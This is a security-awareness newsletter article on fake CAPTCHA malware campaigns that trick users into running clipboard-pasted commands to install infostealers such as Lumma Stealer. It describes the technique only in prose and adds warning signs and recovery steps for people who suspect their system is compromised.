GOTCHA From CAPTCHA Causing More Havoc

February 26, 2026

A new breed of malware campaign is leveraging fake CAPTCHA verification screens to trick users into self-infecting their computers with password-stealing and cryptocurrency-draining malicious software. 

These campaigns often start with lures such as compromised websites or phishing emails that prompt users to solve what appears to be a legitimate CAPTCHA verification challenge. The CAPTCHA is a decoy that copies a malicious command to the system clipboard and instructs the victim to open the Windows Run dialog, paste the copied script, and execute it. 

This single action quietly downloads and installs malware - most commonly infostealers like Lumma Stealer or the Rust-based EDDIESTEALER - which then exfiltrate browser-stored passwords, cookies, and crypto wallet credentials, often targeting Chrome and other major browsers.

The infection routine is highly convincing because it mimics typical web security practices, using imagery and instructions identical to real human verification systems. 

Once the user falls for the ploy, the malware may further exploit system tools, like PowerShell and JavaScript-based payloads, to bypass traditional endpoint defenses and escalate access. 

Attackers typically harvest encrypted browser data, force the browser to load credentials into memory for extraction, and bypass authentication by stealing session cookies. Multi-stage payloads may also incorporate remote access tools, additional infostealers, or even persistent backdoors.

Delivery methods include phishing emails posing as security alerts for GitHub or gaming websites and infected ads or compromised legitimate domains. 

Source: https://icobench.com/news/new-malware-disguised-as-captcha-drains-passwords-and-crypto-funds/

Commentary

Like most malware campaigns, CAPTCHA malware has red flags.

It appears in odd places, such as on random content pages or after clicking an unrelated link or ad, rather than during a normal login, sign-up, or form submission. 
It asks you to do system-level actions, like pressing Windows + R, opening the Run box, copying and pasting a command, or running a script as part of "verification," which legitimate CAPTCHAs never require. 
It requests personal or sensitive data directly in the CAPTCHA flow, such as usernames, passwords, payment information, or crypto wallet details, which is not how genuine CAPTCHAs operate.
It triggers multiple redirects, intrusive pop-ups, or lands you on strange-looking or mismatched domains that do not align with the site you thought you were visiting.
It appears after following a link in a phishing email, a cracked-software download site, or suspicious social media/ad content, especially when coupled with pressure to "fix" a security issue or "verify now".
It uses poor grammar, awkward phrasing, inconsistent branding, or off-looking design elements that do not match known providers like reCAPTCHA or hCaptcha.


Steps to take if you believe your system is compromised:

Immediately disconnect from the internet (Wi?Fi and wired) to reduce further data exfiltration and remote-control potential from infostealers or remote access tools delivered through fake CAPTCHAs.
Report the incident to your organization's IT or security team.
Run a full scan with IT or a reputable security software and allow it to quarantine or remove any detected threats, then consider a second opinion scan from another trusted tool to catch infostealers, RATs, or clipboard hijackers
From a separate, clean device, change passwords for email, banking, crypto exchanges and wallets, and other critical accounts, and enable multi-factor authentication wherever possible to blunt the impact of stolen credentials or session cookies.
Review financial, email, and cloud service activity for unfamiliar logins, transfers, or configuration changes, and promptly notify your bank, credit card issuer, or crypto platform of any suspicious activity so they can lock or monitor accounts.
If you suspect deep compromise, such as repeated detections or signs of remote control, back up only essential data, wipe and reinstall the operating system, then restore from known-good backups and re-secure accounts from a freshly rebuilt environment.


Additional Sources: https://case.edu/news/beware-fake-captcha-pages-spreading-malware; https://www.usnh.edu/it/blog/2025/05/fake-captchas; https://www.hhs.gov/sites/default/files/clickfix-attacks-sector-alert-tlpclear.pdf

Finally, your opinion is important to us. Please complete the opinion survey:

Product

Articles

GOTCHA From CAPTCHA Causing More Havoc

CAPTCHA malware is still a thing. What are the signs you need to know to lower your exposure?

No Pictures, Please: Building Rock-Solid Image And Social Media Policies In Healthcare

Patients sue a hospital over unauthorized images being shared by staff on Snapchat. How can healthcare organizations use governance to prevent exposure? We examine.

Detecting And Preventing Money Laundering In The Workplace

A CEO is convicted of fraud, including money laundering. We examine money laundering schemes, warning signs, and steps employers can take to strengthen controls and reduce risk.

Are You Praising Your Employees Enough? You Make The Call

Surveys reveal that workers want praise, but do not receive it. We want to know what you think. Chime in.

From Opportunistic Malware To Industrialized Extortion: The Rise Of Ransomware As A Service

The DOJ announces charges against an international cybercriminal. We examine industrialized ransomware as a service and its loss exposure for all organizations.